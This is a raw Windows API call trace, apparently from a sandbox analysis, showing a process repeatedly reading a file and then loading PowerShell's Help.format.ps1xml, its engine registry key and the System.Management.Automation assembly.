	[0783.740] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.740] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.741] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.741] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.741] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.742] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.742] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.745] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.745] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.745] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.746] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.746] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.746] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.747] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.747] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.748] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.748] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.748] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.749] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.749] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.749] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.750] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.750] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.754] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.755] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.755] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.755] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.756] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.756] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.756] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.757] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.757] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.757] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.758] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.758] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.758] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.759] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.759] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.759] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.759] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.760] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.760] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.760] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.760] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.761] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.545] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.545] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.545] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.546] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.546] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.546] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.546] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.547] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0784.547] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0xf37, lpOverlapped=0x0) returned 1
	[0784.547] ReadFile (in: hFile=0x314, lpBuffer=0x32f7bff, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f7bff*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0784.547] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0784.548] CloseHandle (hObject=0x314) returned 1
	[0784.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0784.548] SetErrorMode (uMode=0x1) returned 0x1
	[0784.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0784.548] SetErrorMode (uMode=0x1) returned 0x1
	[0784.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0784.548] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0784.548] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0784.549] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0784.549] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47ed70, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0784.549] CoTaskMemFree (pv=0x47ed70) 
	[0784.549] RegCloseKey (hKey=0x314) returned 0x0
	[0784.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0784.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0784.557] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x93cfeba9, Data2=0xabcd, Data3=0x46bb, Data4=([0]=0x8d, [1]=0x48, [2]=0x3f, [3]=0x91, [4]=0x66, [5]=0x89, [6]=0x41, [7]=0x16))) returned 0x0
	[0784.557] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xd77d8130, Data2=0x409c, Data3=0x4098, Data4=([0]=0xb1, [1]=0x51, [2]=0xe4, [3]=0x5a, [4]=0xca, [5]=0x86, [6]=0x83, [7]=0x8c))) returned 0x0
	[0784.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0784.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0784.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0784.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.532] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x47f94336, Data2=0xd4fe, Data3=0x472e, Data4=([0]=0xb6, [1]=0xe2, [2]=0xce, [3]=0x4b, [4]=0xa4, [5]=0x8b, [6]=0xd6, [7]=0xc0))) returned 0x0
	[0785.533] VirtualQuery (in: lpAddress=0x1eb000, lpBuffer=0x1ebec0, dwLength=0x30 | out: lpBuffer=0x1ebec0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0785.534] VirtualQuery (in: lpAddress=0x1eb090, lpBuffer=0x1ebf50, dwLength=0x30 | out: lpBuffer=0x1ebf50*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0785.552] VirtualQuery (in: lpAddress=0x1eb800, lpBuffer=0x1ec6c0, dwLength=0x30 | out: lpBuffer=0x1ec6c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0785.553] VirtualQuery (in: lpAddress=0x1eb770, lpBuffer=0x1ec630, dwLength=0x30 | out: lpBuffer=0x1ec630*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0785.554] VirtualQuery (in: lpAddress=0x1eb800, lpBuffer=0x1ec6c0, dwLength=0x30 | out: lpBuffer=0x1ec6c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0785.555] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xb1e98a37, Data2=0xf650, Data3=0x40ec, Data4=([0]=0xb8, [1]=0x6, [2]=0x36, [3]=0x6, [4]=0xca, [5]=0x1a, [6]=0x19, [7]=0xc8))) returned 0x0
	[0785.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
